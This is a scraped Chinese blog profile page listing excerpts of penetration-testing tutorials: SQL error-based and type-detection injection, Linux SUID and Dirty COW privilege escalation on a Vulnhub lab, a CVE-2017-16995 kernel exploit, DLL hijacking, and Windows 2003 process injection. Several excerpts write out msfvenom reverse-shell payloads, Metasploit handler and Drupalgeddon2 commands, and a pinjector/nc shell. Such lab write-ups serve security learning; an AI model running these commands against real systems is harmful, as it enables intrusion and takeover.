自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(7)
  • 收藏
  • 关注

转载 sql注入_报错注入中的count()、rand()、group by()函数原理分析

想要了解的朋友的可以看看下面链接里的文章,写的非常棒,理解起来清晰透彻。https://www.2cto.com/article/201604/498394.html假设我们的查询语句select count(*), (floor(rand()*2)) as key from tables group by key在使用count()函数和group by 函数时会产生一个虚拟表,这个虚拟表中只有俩个字段,一个是key,一个是count(*),同时这个虚拟表有个特性,就是当数据插入到其中

2022-01-20 17:33:56 672

原创 sql注入_字符型、数字型判断

如何判断sql注入是字符型还是数字型?在进行sql注入时,字段类型分为字符型或者数字型,意味着我们需要构造不同的sql语句。假设存在sql注入的url是:http://192.168.0.1/id=1数字型判定1、and或者or假设数据库的执行语句是:select * from table where id=$id当查询id=1的页面时返回正常页面,此时执行的语句是:select * from table where id=1假如在1后面加上 and 1=2 , $id的值就是1 and

2022-01-12 14:56:32 7450

原创 提权_Linux提权_suid

1.MSF连接目标机生成msf后门,上传到目标机,开启监听,等待运行。>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -i 3 -f elf -o shell //生成后门>set payload linux/x64/meterpreter/reverse_tcp>set lhost 0.0.0.0>set lport 6666>exploit2

2021-12-08 15:28:07 2411

原创 提权_Linux 脏牛漏洞提权 【Vulnhub靶场 Lampiao】

1.nmap 扫描主机扫描同网段存活主机扫描目标主机开放端口,扫描到开放了1898端口nmap -p1-65535 192.168.61.1382.发现web网站,搜集利用漏洞通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupalmsf 搜索drupal漏洞,使用可利用漏洞进行攻击>search drupal>use exploit/unix/webapp/drupal_drupalgeddon2>set rhosts 192.

2021-12-07 17:25:09 3274

原创 提权_【CVE-2017-16995】 Linux 内核漏洞提权

1.信息收集上传信息收集脚本,运行并查看是否有【CVE-2017-16995】漏洞这里我用到的信息收集脚本为:linux-exploit-suggester-2.plperl linux-exploit-suggester-2.pl2.上传EXP3.编译执行gcc 45010.c -o 45010 //编译45010.c./45010 //运行45010,运行不了就【chmod +x 45010】给他个执行权限

2021-11-29 13:00:55 2813

原创 提权_DLL劫持提权

1.通过火绒剑分析进程分析进程调用模块,找到可以利用的dll文件,本次试验劫持idmmkb.dll文件2.MSF生成后门dll木马msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.131 lport=8888 -f dll >C:\Users\Ninja\Desktop\idmmkb.dll3.上传替换4.MSF监听>use exploit/multi/handler>set payload

2021-11-23 16:07:48 1679

原创 提权_Windows 2003 进程注入提权

1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PIDpinjector.exe -l这里我们注入进程services.exe,可以看到它是系统权限运行的进程,记住的它的PID:3562.接着使用命令注入刚才记住的进程,监听端口设置为9988pinjector.exe -p 356 cmd.exe 99883.最后我们使用 nc 监听本地9988的端口使用命令 whoami 可以看到注入提权成功。...

2021-11-22 09:56:59 1705

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除